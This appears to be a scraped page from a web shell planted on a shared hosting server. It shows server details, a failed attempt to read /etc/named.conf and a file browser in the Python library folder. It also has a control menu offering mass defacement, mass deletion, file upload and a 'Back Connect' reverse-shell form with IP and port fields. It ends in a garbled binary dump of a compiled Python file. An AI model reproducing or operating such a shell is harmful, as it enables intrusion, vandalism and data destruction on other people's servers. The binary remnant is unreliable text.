Linux premium216.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
66.29.141.148 | Your IP: 3.146.178.81
Cant read [ /etc/named.conf ]
[
drwxr-xr-x
]
/
lib64
/
python2.7
/
Submit
Home
Upload
Mass Deface
Mass Delete
Back Connect
Notify
File Uploader
Upload
File Name
File Content
Create
Folder Name
Create
Directory
File Name
File Content
Submit
Directory
File Name
Submit
Ip
Port
Submit
Nickname
Team
Website
Submit
popen2.pyo
� zfc @ sV d Z d d l Z d d l Z d d l Z e j d e d d �d d d g Z y e j d � Z Wn e e f k r� d Z n Xg Z d � Z d d d � � YZ d e f d � � YZ e j d d k s� e j d k r[ [ d d d � Z d d d � Z d d d � Z n@ d d d � Z d d d � Z d d d � Z e j d d g � d S( sn Spawn a command with pipes to its stdin, stdout, and optionally stderr. The normal os.popen(cmd, mode) call spawns a shell command and provides a file interface to just the input or output of the process depending on whether mode is 'r' or 'w'. This module provides the functions popen2(cmd) and popen3(cmd) which return two or three pipes to the spawned command. i����Ns<